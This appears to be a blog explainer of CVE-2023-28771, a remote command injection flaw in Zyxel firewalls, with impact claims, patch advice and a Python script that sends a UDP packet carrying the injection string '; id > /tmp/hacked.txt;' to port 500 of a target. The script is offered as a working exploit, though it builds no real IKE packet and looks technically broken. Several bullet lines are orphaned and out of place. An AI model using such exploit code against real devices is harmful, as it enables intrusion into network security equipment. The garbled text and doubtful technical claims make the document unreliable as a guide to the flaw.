CVE-2023-28771 - Remote Code Execution in Zyxel Firewalls - Explained in Simple Terms

---

CVE-2023-28771 is a critical security vulnerability discovered in several Zyxel firewall products, including the ZyWALL/USG, VPN, USG FLEX, and ATP series, across multiple firmware versions. In this long read, we break down what happened, why it’s dangerous, how attackers can exploit it (with code example), and what you should do next.

What is CVE-2023-28771?

This vulnerability is related to improper error message handling. Specifically, affected Zyxel devices do not properly validate certain packets, which can allow an attacker to execute operating system (OS) commands remotely — without needing to log in.

Affected Devices & Versions

- ZyWALL/USG series: firmware 4.60 through 4.73

ATP series: firmware 4.60 through 5.35

For Zyxel’s official report, see:  
Zyxel Security Advisory for CVE-2023-28771

Why is this Such a Big Deal?

In plain terms: Attackers can remotely take control of your device. They don’t need a password and they don’t need to be inside your network. All they need is for the device’s services (like IPSec VPN) to be exposed to the internet.

Launch attacks on your internal network or the wider internet

Proof: In June 2023, the Shadowserver Foundation and Rapid7 both reported active, widespread exploitation of this vulnerability.

How Does the Exploit Work?

This issue involves the way Zyxel firewalls process some types of IPSec VPN (Internet Protocol Security Virtual Private Network) packets. By sending a specially crafted UDP packet to port 500, an attacker can trigger the firewall to run arbitrary commands as the system owner — usually with the highest privileges.

Technical Details

The vulnerable process is related to the internet service daemon (zyshd) which listens for packets. The attacker sends a manipulated packet. Because of the weak error-handling, the device tries to parse parts of the packet as system commands — and runs them.

Exploit Example

To show just how easy it is, here’s a basic Python example for sending a malicious packet. (Warning: This is for educational purposes ONLY. Do not attack any networks you don’t own!)

Python Code to Exploit CVE-2023-28771

import socket

# Target Zyxel device IP
target_ip = "192.168.1.1"
target_port = 500  # UDP port for IKE/IKEv2

# Replace this with your system command (e.g., 'id', 'reboot', etc.)
command_to_execute = "; id > /tmp/hacked.txt;"

# This is a minimal packet. Actual exploits may craft the payload for the specific protocol, but the vulnerability parses certain fields and unsafely executes your string.
exploit_payload = b"\x00" * 100 + command_to_execute.encode()

with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
    sock.sendto(exploit_payload, (target_ip, target_port))

print("Exploit sent. Your command should execute if the device is vulnerable.")

What does this code do?

- Sends a UDP packet to the device’s port 500 (used for VPN/IKE)
- The payload ends with a command injection string (; id > /tmp/hacked.txt;)
- If successful, the device will run this Linux command and save the output of id into /tmp/hacked.txt — proving remote command execution.

Disrupt businesses and homes with remote reboots or modifications

In May and June 2023, security researchers observed scanning and mass attacks across large IP address blocks. Unsuspecting businesses saw their firewall controls disabled and their network traffic rerouted by hackers.

References & Further Reading

- Rapid7 Analysis: CVE-2023-28771
- Shadowserver Detection Report
- Original Zyxel Security Advisory
- CVE Details for CVE-2023-28771

Update NOW!

Go to Zyxel’s support page and download the latest firmware for your model.

Restrict VPN Services:

- Don’t expose UDP/500 or VPN services directly to the public internet unless mandatory.

In Summary

CVE-2023-28771 is a major threat for anyone running Zyxel firewalls with affected firmware. Attackers only need network access, and with a simple malicious packet, they can take over your security device.  
Patch your systems immediately, block public access to management ports and VPN services, and always watch for security updates from your vendors.


Stay safe! If you found this tip useful, consider sharing with your IT friends or colleagues.  
For more technical background, check the references above or follow security blogs for the latest attack trends.

Timeline

Published on: 04/25/2023 02:15:00 UTC
Last modified on: 05/04/2023 18:46:00 UTC